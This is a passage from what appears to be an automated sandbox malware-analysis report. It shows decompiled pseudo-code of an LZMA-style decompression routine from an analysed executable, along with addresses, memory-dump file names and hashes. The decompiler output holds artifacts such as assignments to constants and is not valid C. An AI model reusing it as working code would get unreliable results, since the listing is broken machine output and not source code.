                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L80;
                										case 0x1b:
                											L76:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t275 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t275;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t284 = __ebp - 0x64;
                											 *_t284 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t284;
                											 *( *(__ebp - 0x68)) = __cl;
                											L80:
                											 *(__ebp - 0x14) = __edx;
                											goto L81;
                										case 0x1c:
                											while(1) {
                												L124:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t415 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t415;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t415;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L81:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											 *(__ebp - 0x88) = 0x1c;
                											L170:
                											_push(0x22);
                											_pop(_t567);
                											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                											_t535 = 0;
                											L172:
                											return _t535;
                									}
                								}
                								L171:
                								_t535 = _t534 | 0xffffffff;
                								goto L172;
                							}
                						}
                						__eax =  *(__ebp - 0x50);
                						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                						__eax =  *(__ebp - 0x58);
                						__esi = __edx + __eax;
                						 *(__ebp - 0x54) = __esi;
                						__ax =  *__esi;
                						__edi = __ax & 0x0000ffff;
                						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                						if( *(__ebp - 0xc) >= __ecx) {
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                							__cx = __ax;
                							__cx = __ax >> 5;
                							__eax = __eax - __ecx;
                							__edx = __edx + 1;
                							 *__esi = __ax;
                							 *(__ebp - 0x50) = __edx;
                						} else {
                							 *(__ebp - 0x10) = __ecx;
                							0x800 = 0x800 - __edi;
                							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                							 *__esi = __cx;
                						}
                						if( *(__ebp - 0x10) >= 0x1000000) {
                							goto L148;
                						} else {
                							goto L146;
                						}
                					}
                					goto L1;
                				}
                			}








                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00406909
                0x0040690f
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00406848
                0x00000000
                0x004066bd

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                • Instruction ID: d4317c89d1632f45c632c26a697e2fc4357ac15b25f122c790db5755eb07ebec
                • Opcode Fuzzy Hash: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                • Instruction Fuzzy Hash: 83913171D00229CBDF28CF98C854BADBBB1FB44309F15816AD856BB281C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E004063CF() {
                				unsigned short _t532;
                				signed int _t533;
                				void _t534;
                				void* _t535;
                				signed int _t536;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						L89:
                						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                						L69:
                						_t606 =  *(_t613 - 0x58);
                						 *(_t613 - 0x84) = 0x12;
                						L132:
                						 *(_t613 - 0x54) = _t606;
                						L133:
                						_t532 =  *_t606;
                						_t589 = _t532 & 0x0000ffff;
                						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                						if( *(_t613 - 0xc) >= _t565) {
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                							 *(_t613 - 0x40) = 1;
                							_t533 = _t532 - (_t532 >> 5);
                							 *_t606 = _t533;
                						} else {
                							 *(_t613 - 0x10) = _t565;
                							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                						}
                						if( *(_t613 - 0x10) >= 0x1000000) {
                							L139:
                							_t534 =  *(_t613 - 0x84);
                							L140:
                							 *(_t613 - 0x88) = _t534;
                							goto L1;
                						} else {
                							L137:
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 5;
                								goto L170;
                							}
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							goto L139;
                						}
                					} else {
                						if( *(__ebp - 0x60) == 0) {
                							L171:
                							_t536 = _t535 | 0xffffffff;
                							L172:
                							return _t536;
                						}
                						__eax = 0;
                						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                						0 | _t258 = _t258 + _t258 + 9;
                						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                						L75:
                						if( *(__ebp - 0x64) == 0) {
                							 *(__ebp - 0x88) = 0x1b;
                							L170:
                							_t568 = 0x22;
                							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                							_t536 = 0;
                							goto L172;
                						}
                						__eax =  *(__ebp - 0x14);
                						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                						if(__eax >=  *(__ebp - 0x74)) {
                							__eax = __eax +  *(__ebp - 0x74);
                						}
                						__edx =  *(__ebp - 8);
                						__cl =  *(__eax + __edx);
                						__eax =  *(__ebp - 0x14);
                						 *(__ebp - 0x5c) = __cl;
                						 *(__eax + __edx) = __cl;
                						__eax = __eax + 1;
                						__edx = 0;
                						_t274 = __eax %  *(__ebp - 0x74);
                						__eax = __eax /  *(__ebp - 0x74);
                						__edx = _t274;
                						__eax =  *(__ebp - 0x68);
                						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                						_t283 = __ebp - 0x64;
                						 *_t283 =  *(__ebp - 0x64) - 1;
                						 *( *(__ebp - 0x68)) = __cl;
                						L79:
                						 *(__ebp - 0x14) = __edx;
                						L80:
                						 *(__ebp - 0x88) = 2;
                					}
                					L1:
                					_t535 =  *(_t613 - 0x88);
                					if(_t535 > 0x1c) {
                						goto L171;
                					}
                					switch( *((intOrPtr*)(_t535 * 4 +  &M00406926))) {
                						case 0:
                							if( *(_t613 - 0x6c) == 0) {
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							_t535 =  *( *(_t613 - 0x70));
                							if(_t535 > 0xe1) {
                								goto L171;
                							}
                							_t539 = _t535 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t570);
                							_push(9);
                							_pop(_t571);
                							_t609 = _t539 / _t570;
                							_t541 = _t539 % _t570 & 0x000000ff;
                							asm("cdq");
                							_t604 = _t541 % _t571 & 0x000000ff;
                							 *(_t613 - 0x3c) = _t604;
                							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                							_t612 = (0x300 << _t604 + _t609) + 0x736;
                							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                								L10:
                								if(_t612 == 0) {
                									L12:
                									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                									goto L15;
                								} else {
                									goto L11;
                								}
                								do {
                									L11:
                									_t612 = _t612 - 1;
                									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                								} while (_t612 != 0);
                								goto L12;
                							}
                							if( *(_t613 - 4) != 0) {
                								GlobalFree( *(_t613 - 4));
                							}
                							_t535 = GlobalAlloc(0x40, 0x600); // executed
                							 *(_t613 - 4) = _t535;
                							if(_t535 == 0) {
                								goto L171;
                							} else {
                								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                								goto L10;
                							}
                						case 1:
                							L13:
                							__eflags =  *(_t613 - 0x6c);
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 1;
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							_t45 = _t613 - 0x48;
                							 *_t45 =  *(_t613 - 0x48) + 1;
                							__eflags =  *_t45;
                							L15:
                							if( *(_t613 - 0x48) < 4) {
                								goto L13;
                							}
                							_t547 =  *(_t613 - 0x40);
                							if(_t547 ==  *(_t613 - 0x74)) {
                								L20:
                								 *(_t613 - 0x48) = 5;
                								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                								goto L23;
                							}
                							 *(_t613 - 0x74) = _t547;
                							if( *(_t613 - 8) != 0) {
                								GlobalFree( *(_t613 - 8));
                							}
                							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                							 *(_t613 - 8) = _t535;
                							if(_t535 == 0) {
                								goto L171;
                							} else {
                								goto L20;
                							}
                						case 2:
                							L24:
                							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                							 *(_t613 - 0x84) = 6;
                							 *(_t613 - 0x4c) = _t554;
                							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                							goto L132;
                						case 3:
                							L21:
                							__eflags =  *(_t613 - 0x6c);
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 3;
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							_t67 = _t613 - 0x70;
                							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                							__eflags =  *_t67;
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							L23:
                							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                							if( *(_t613 - 0x48) != 0) {
                								goto L21;
                							}
                							goto L24;
                						case 4:
                							goto L133;
                						case 5:
                							goto L137;
                						case 6:
                							__edx = 0;
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) = 1;
                								 *(__ebp - 0x84) = 7;
                								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                							__esi =  *(__ebp - 0x60);
                							__cl = 8;
                							__cl = 8 -  *(__ebp - 0x3c);
                							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                							__ecx =  *(__ebp - 0x3c);
                							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                							__ecx =  *(__ebp - 4);
                							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                							__eflags =  *(__ebp - 0x38) - 4;
                							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                							if( *(__ebp - 0x38) >= 4) {
                								__eflags =  *(__ebp - 0x38) - 0xa;
                								if( *(__ebp - 0x38) >= 0xa) {
                									_t98 = __ebp - 0x38;
                									 *_t98 =  *(__ebp - 0x38) - 6;
                									__eflags =  *_t98;
                								} else {
                									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                								}
                							} else {
                								 *(__ebp - 0x38) = 0;
                							}
                							__eflags =  *(__ebp - 0x34) - __edx;
                							if( *(__ebp - 0x34) == __edx) {
                								__ebx = 0;
                								__ebx = 1;
                								goto L61;
                							} else {
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__ecx =  *(__ebp - 8);
                								__ebx = 0;
                								__ebx = 1;
                								__al =  *((intOrPtr*)(__eax + __ecx));
                								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                								goto L41;
                							}
                						case 7:
                							__eflags =  *(__ebp - 0x40) - 1;
                							if( *(__ebp - 0x40) != 1) {
                								__eax =  *(__ebp - 0x24);
                								 *(__ebp - 0x80) = 0x16;
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x28);
                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                								__eax =  *(__ebp - 0x2c);
                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                								__eax = 0;
                								__eflags =  *(__ebp - 0x38) - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                								__eax =  *(__ebp - 4);
                								__eax =  *(__ebp - 4) + 0x664;
                								__eflags = __eax;
                								 *(__ebp - 0x58) = __eax;
                								goto L69;
                							}
                							__eax =  *(__ebp - 4);
                							__ecx =  *(__ebp - 0x38);
                							 *(__ebp - 0x84) = 8;
                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                							goto L132;
                						case 8:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xa;
                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                							} else {
                								__eax =  *(__ebp - 0x38);
                								__ecx =  *(__ebp - 4);
                								__eax =  *(__ebp - 0x38) + 0xf;
                								 *(__ebp - 0x84) = 9;
                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                							}
                							goto L132;
                						case 9:
                							goto L0;
                						case 0xa:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xb;
                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x28);
                							goto L88;
                						case 0xb:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__ecx =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x20);
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                							} else {
                								__eax =  *(__ebp - 0x24);
                							}
                							__ecx =  *(__ebp - 0x28);
                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                							L88:
                							__ecx =  *(__ebp - 0x2c);
                							 *(__ebp - 0x2c) = __eax;
                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                							goto L89;
                						case 0xc:
                							L99:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xc;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t334 = __ebp - 0x70;
                							 *_t334 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t334;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							__eax =  *(__ebp - 0x2c);
                							goto L101;
                						case 0xd:
                							L37:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xd;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t122 = __ebp - 0x70;
                							 *_t122 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t122;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L39:
                							__eax =  *(__ebp - 0x40);
                							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                								goto L48;
                							}
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								goto L54;
                							}
                							L41:
                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                							__ecx =  *(__ebp - 0x58);
                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                							 *(__ebp - 0x48) = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi =  *(__ebp - 0x58) + __eax * 2;
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								 *(__ebp - 0x40) = 1;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L39;
                							} else {
                								goto L37;
                							}
                						case 0xe:
                							L46:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xe;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t156 = __ebp - 0x70;
                							 *_t156 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t156;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							while(1) {
                								L48:
                								__eflags = __ebx - 0x100;
                								if(__ebx >= 0x100) {
                									break;
                								}
                								__eax =  *(__ebp - 0x58);
                								__edx = __ebx + __ebx;
                								__ecx =  *(__ebp - 0x10);
                								__esi = __edx + __eax;
                								__ecx =  *(__ebp - 0x10) >> 0xb;
                								__ax =  *__esi;
                								 *(__ebp - 0x54) = __esi;
                								__edi = __ax & 0x0000ffff;
                								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                								__eflags =  *(__ebp - 0xc) - __ecx;
                								if( *(__ebp - 0xc) >= __ecx) {
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                									__cx = __ax;
                									_t170 = __edx + 1; // 0x1
                									__ebx = _t170;
                									__cx = __ax >> 5;
                									__eflags = __eax;
                									 *__esi = __ax;
                								} else {
                									 *(__ebp - 0x10) = __ecx;
                									0x800 = 0x800 - __edi;
                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                									__ebx = __ebx + __ebx;
                									 *__esi = __cx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									continue;
                								} else {
                									goto L46;
                								}
                							}
                							L54:
                							_t173 = __ebp - 0x34;
                							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                							__eflags =  *_t173;
                							goto L55;
                						case 0xf:
                							L58:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xf;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t203 = __ebp - 0x70;
                							 *_t203 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t203;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L60:
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								L55:
                								__al =  *(__ebp - 0x44);
                								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                								goto L56;
                							}
                							L61:
                							__eax =  *(__ebp - 0x58);
                							__edx = __ebx + __ebx;
                							__ecx =  *(__ebp - 0x10);
                							__esi = __edx + __eax;
                							__ecx =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								_t217 = __edx + 1; // 0x1
                								__ebx = _t217;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L60;
                							} else {
                								goto L58;
                							}
                						case 0x10:
                							L109:
